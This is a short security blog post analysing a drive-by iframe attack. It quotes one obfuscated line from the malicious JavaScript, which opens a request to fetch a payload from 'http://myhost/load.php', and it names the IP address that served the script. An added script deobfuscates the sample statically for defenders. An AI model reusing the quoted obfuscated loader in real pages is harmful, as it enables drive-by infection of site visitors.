Tuesday, July 1, 2008

** server can't find myhost: SERVFAIL

Nothing quite brings a smile to my face like when a script kiddie isn't quite smart enough to figure out the already highly automated tools they have at their disposal. A great reference is a recent hit of ours. It started out like any other minor incident: a user was browsing a website that was a victim of some sort of attack. This attack then snuck an iframe into the HTML that referenced a .js file at "123.231.102.209" (which, by the way, if you're running, you might want to make sure you're not compromised). The file was pretty heavily obfuscated with the usual string-replacement style (shown below). However, my favorite part of it was the following:

NknOUUaTGunmGbyZiIFLV.open("3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoMET".replace(/3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoM/ig, "G"),'http://myhost/load.php?bof',false);

This opens the following URL, http://myhost/load.php?bof, but the thing to note here is that in whatever automation software the attacker was using, they forgot to put something slightly more useful to them, and something slightly less hilarious to me, than "myhost" as the hostname.
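The string-replacement trick above can be undone statically, without ever executing the dropped script. The following is an added example (not code from the original post or from the sample itself) that folds `"literal".replace(/regex/flags, "text")` calls into the strings they evaluate to and then reads the HTTP method and URL off the `.open(` call; it assumes plain double-quoted literals with no escape sequences, which is what this sample uses.

```javascript
// Static folding of the `"literal".replace(/re/flags, "text")` obfuscation
// used in the dropped .js. Only the string literal and the regex are
// evaluated; the surrounding script never runs, so this is safe on samples.

// Matches one foldable call. Literal and replacement are restricted to
// double-quoted strings without escapes (assumption); anything fancier is
// left untouched rather than guessed at.
const FOLDABLE = /"([^"\\]*)"\.replace\(\/((?:\\.|[^\/\\\n])+)\/([a-z]*)\s*,\s*"([^"\\]*)"\)/g;

// Rewrite every foldable call into the string it evaluates to.
function foldStringReplaces(src) {
  return src.replace(FOLDABLE, (whole, literal, pattern, flags, replacement) => {
    let re;
    try {
      re = new RegExp(pattern, flags);
    } catch (e) {
      return whole; // malformed regex: leave the call in place
    }
    // Function replacement so "$1"-style tokens in the text stay literal.
    const value = literal.replace(re, () => replacement);
    return JSON.stringify(value);
  });
}

// After folding, pull the method and URL out of every `.open(` call so the
// request the sample would make can be read without running it.
function extractOpenCalls(src) {
  const folded = foldStringReplaces(src);
  const OPEN = /\.open\(\s*"([^"]*)"\s*,\s*['"]([^'"]*)['"]/g;
  const calls = [];
  let m;
  while ((m = OPEN.exec(folded)) !== null) {
    calls.push({ method: m[1], url: m[2] });
  }
  return calls;
}

// Constructed sample: the single line quoted in the post.
const SAMPLE =
  'NknOUUaTGunmGbyZiIFLV.open("3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoMET".replace(/3vZVKO9ZLFz6PqIl9Uxisuv5Y0BhoM/ig, "G"),\'http://myhost/load.php?bof\',false);';

console.log(foldStringReplaces(SAMPLE));
console.log(extractOpenCalls(SAMPLE)); // [ { method: 'GET', url: 'http://myhost/load.php?bof' } ]
```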

Just further proof that while there is some good talent out there, there really is a lot to be desired.
